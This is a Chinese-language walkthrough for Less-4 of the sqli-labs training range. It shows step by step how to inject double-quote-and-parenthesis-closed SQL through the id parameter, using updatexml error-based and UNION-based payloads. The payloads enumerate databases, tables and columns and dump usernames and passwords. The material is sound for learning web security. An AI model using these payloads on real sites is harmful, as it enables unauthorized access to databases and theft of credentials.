sqli靶场通关之less4

sqli

less4

方法一:updatexml报错函数

1. 找闭合字符
id = 1”) //异常 
id = 1”) and 1 =1 -- + //正确 
id = 1”) and 1 =2 -- + //错误
  • 说明可能存在双引号字符型注入
2. 求列数
id=1") order by 3 -- +

sqli靶场通关之less4_第1张图片

id=1") order by 4 -- +

sqli靶场通关之less4_第2张图片

  • 说明有3列
3. 求显示位
id=1") and 1=2 union select 1,2,3 -- +

sqli靶场通关之less4_第3张图片

4. 爆数据库名
id=1") and updatexml(1,concat(0x7e,(select database()),0x7e),1) -- +

sqli靶场通关之less4_第4张图片

5. 爆表名
id=1") and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='security')),1) -- +

sqli靶场通关之less4_第5张图片

6. 爆列名
id=1") and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users')),1) -- +

sqli靶场通关之less4_第6张图片

id=1") and updatexml(1,concat(0x7e,(select group_concat(username,0x7e,password)from security.users)),1) -- +

sqli靶场通关之less4_第7张图片

8. 爆用户名为admin4的密码
id=1") and updatexml(1,concat(0x7e,(select group_concat(username,0x7e,password)from security.users where username='admin4')),1) -- +

sqli靶场通关之less4_第8张图片

方法二: union联合注入

1. 找闭合字符
id = 1”) //异常 
id = 1”) and 1 =1 -- + //正确 
id = 1”) and 1 =2 -- + //错误
  • 说明可能存在双引号字符型注入
2. 求列数
id=1") order by 3 -- +

sqli靶场通关之less4_第9张图片

id=1") order by 4 -- +

sqli靶场通关之less4_第10张图片

  • 说明有3列
3. 求显示位
id=1") and 1=2 union select 1,2,3 -- +

sqli靶场通关之less4_第11张图片

4. 爆数据库名
id=1") and 1=2 union select 1,version(),database() -- +

sqli靶场通关之less4_第12张图片

  • 数据库名为:security
  • 查询一下所有数据库名
id=1") and 1=2 union select 1,2,(select group_concat(schema_name) from information_schema.schemata) -- +

sqli靶场通关之less4_第13张图片

  • 发现有security库
5. 爆表名
id=1") and 1=2 union select 1,2,(select group_concat(table_name) from information_schema.tables where table_schema='security') -- +

sqli靶场通关之less4_第14张图片

  • 发现有4个表,users表应该是想要找的用户表
6. 爆列名
id=1") and 1=2 union select 1,2,(select group_concat(column_name) from information_schema.columns where table_name='users' and table_schema='security') -- +

sqli靶场通关之less4_第15张图片

7. 爆字段名
id=1") and 1=2 union select 1,(select group_concat(username) from security.users),(select group_concat(password) from security.users) -- +

sqli靶场通关之less4_第16张图片

8. 爆用户名为admin4的密码
id=1") and 1=2 union select 1,2,(select group_concat(username,password) from security.users where username='admin4') -- +

sqli靶场通关之less4_第17张图片

你可能感兴趣的:(靶场,网络安全)